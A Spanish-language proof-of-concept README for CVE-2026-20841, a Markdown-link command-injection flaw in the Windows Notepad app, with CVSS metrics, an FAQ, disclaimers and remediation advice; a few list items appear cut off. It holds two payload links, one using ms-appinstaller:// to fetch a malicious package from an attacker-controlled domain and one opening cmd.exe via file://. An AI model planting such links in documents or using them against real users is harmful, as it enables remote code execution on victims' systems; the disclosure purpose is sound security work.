
Prueba de concepto que demuestra la inyección de comandos en el Bloc de notas de Windows mediante enlaces Markdown manipulados, lo que permite la ejecución remota de código. Incluye vectores de ataque, métricas CVSS y orientación de remediación.
| Campo | Detalle |
|---|
| ID CVE | CVE-2026-20841 |
| Título | Vulnerabilidad de Ejecución Remota de Código en la Aplicación Bloc de Notas de Windows |
| Impacto | Ejecución Remota de Código |
| Severidad Máxima | Importante |
| CVSS v3.1 Base / Temporal | 8.8 / 7.7 |
| Vector CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: Neutralización Incorrecta de Elementos Especiales utilizados en un Comando ('Inyección de Comandos') |
| Producto Afectado | Aplicación Bloc de Notas de Windows (versión de Microsoft Store, compilaciones anteriores a 11.2510) |
| CNA Asignador | Microsoft |
| Publicado | 10 de febrero de 2026 |
| Divulgado Públicamente | No |
| Explotado | No |
| Evaluación de Explotabilidad | Explotación Menos Probable |
La neutralización incorrecta de elementos especiales utilizados en un comando ('inyección de comandos') en la aplicación Bloc de Notas de Windows permite que un atacante no autorizado ejecute código a través de la red.
La aplicación moderna Bloc de Notas de Windows (distribuida a través de Microsoft Store) introdujo soporte de renderizado Markdown, que incluye hipervínculos clicables. La vulnerabilidad existe porque el Bloc de Notas no valida ni sanea adecuadamente los esquemas de URI dentro de los enlaces Markdown antes de procesarlos. Un atacante puede crear un archivo .md malicioso que contenga enlaces especialmente formados que, al hacer clic el usuario, activen manejadores de protocolo no verificados para cargar y ejecutar contenido remoto.
| Métrica | Valor |
|---|---|
| Vector de Ataque | Red |
| Complejidad de Ataque | Baja |
| Privilegios Requeridos | Ninguno |
| Interacción del Usuario | Requerida |
| Alcance | Sin Cambios |
| Impacto de Confidencialidad | Alto |
| Impacto de Integridad | Alto |
| Impacto de Disponibilidad | Alto |
| Métrica | Valor |
|---|---|
| Madurez del Código de Explotación | No Probado |
| Nivel de Remediación | Corrección Oficial |
| Confianza del Informe | Confirmado |
¿Cómo podría un atacante explotar esta vulnerabilidad?
Un atacante podría engañar a un usuario para que haga clic en un enlace malicioso dentro de un archivo Markdown abierto en el Bloc de Notas, provocando que la aplicación lance protocolos no verificados que carguen y ejecuten archivos remotos.
¿Cuál es el contexto objetivo de la ejecución remota de código?
Según la métrica CVSS, el vector de ataque es red (AV:N) y se requiere interacción del usuario (UI:R). El código malicioso se ejecutaría en el contexto de seguridad del usuario que abrió el archivo Markdown, otorgando al atacante los mismos permisos que ese usuario.
.md) que contiene hipervínculos maliciosos.ms-appinstaller://) que pueden obtener y ejecutar cargas útiles remotas, o URIs file:// que pueden lanzar directamente ejecutables locales.Aviso legal: Esta prueba de concepto se proporciona estrictamente con fines educativos y de investigación de seguridad autorizada únicamente. No la utilice contra sistemas que no posea o para los cuales no tenga permiso escrito explícito para probar. El acceso no autorizado a sistemas informáticos es ilegal y punible por ley.
La PoC demuestra dos vectores de ataque a través de enlaces Markdown manipulados:
Vector 1 - Instalación de carga útil remota mediante abuso del manejador de protocolo:
[Click to view document](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
Vector 2 - Invocación de ejecutable local mediante URI de archivo:
[Click here](file://C:/windows/system32/cmd.exe)

.md de fuentes no confiables en el Bloc de Notas.La información proporcionada en este repositorio es únicamente con fines educativos y de investigación de seguridad autorizada. Esta prueba de concepto se comparte para ayudar a los defensores a comprender y mitigar la vulnerabilidad. El autor no es responsable de ningún uso indebido de la información o las herramientas aquí proporcionadas. Siempre obtenga la autorización escrita adecuada antes de probar vulnerabilidades en cualquier sistema. El acceso no autorizado a sistemas informáticos es un delito penal en la mayoría de las jurisdicciones. Úselo de manera responsable y ética.